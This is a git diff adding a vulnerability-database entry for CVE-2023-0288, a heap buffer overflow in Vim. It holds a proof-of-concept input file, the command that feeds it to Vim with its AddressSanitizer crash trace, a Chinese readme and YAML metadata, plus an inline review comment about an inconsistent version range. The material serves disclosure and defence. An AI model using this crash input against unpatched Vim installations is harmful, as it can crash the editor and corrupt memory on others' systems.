diff --git a/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..78779922fb8c5171d14e2c2ba2b09735ffd52379
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat
@@ -0,0 +1 @@
+sil0norm8R V{zf8=Lu
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md
new file mode 100644
index 0000000000000000000000000000000000000000..5ad3db9d77d49e6873c94394a59e830af7ef112c
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0288/readme.md
@@ -0,0 +1,101 @@
+#### 描述
+
+memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
+
+#### 影响版本
+
+```
+git log
+commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
+```
+
+#### Proof of Concept
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
+=================================================================
+==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
+READ of size 2147479553 at 0x621000009d00 thread T0
+ #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
+ #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
+ #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
+ #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
+ #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
+ #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
+ #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
+ #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
+ #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
+ #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
+ #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+ #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
+ #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
+ #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
+ #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+ #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+ #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+ #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+ #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+ #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+ #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+ #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+ #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
+ #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+ #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
+ #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+ #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
+allocated by thread T0 here:
+ #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
+ #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
+ #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
+ #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
+ #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
+ #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
+ #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
+ #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
+ #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
+ #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
+ #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+ #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
+Shadow bytes around the buggy address:
+ 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==11458==ABORTING
+```
+
+#### 影响
+
+这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..08329eac674febe2b7f5d153997bcd4193b0467b
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-0288
+source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
+ scope-of-influence:
+ vim < 9.0.1182
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0288
+ cwe-id: CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, 堆buffer溢出漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index e5495c407d72ddeb60d03a6c02759cc4d7de57ca..53dee26795c5376288eb3a282d8525f9eedd8a7e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
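Review bot: `scope-of-influence: vim < 9.0.1182` excludes the very version this record calls vulnerable — the `description` two lines above says the overflow exists in 9.0.1182, and the readme added in the same commit reproduces the PoC at tag v9.0.1182 (commit 043d7b2c). The upper bound should be the first release that carries the fix, which this commit does not name, so it should become `vim < <FIXED_VERSION>` (placeholder, to be filled from the upstream patch); at minimum the line must read `vim <= 9.0.1182` so the range and the description agree. Separately, `cnvd-id: None` and `kve-id: None` parse as the string "None" rather than a YAML null — if downstream tooling tests for absence of these ids, `null` or an empty value would be the safer encoding, though I cannot tell from this hunk what the consumer expects.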
@@ -107,6 +107,7 @@ cve:
 - CVE-2023-0049
 - CVE-2023-0051
 - CVE-2023-0054
+ - CVE-2023-0288
 - CVE-2023-0512
 - CVE-2023-1127
 openssl: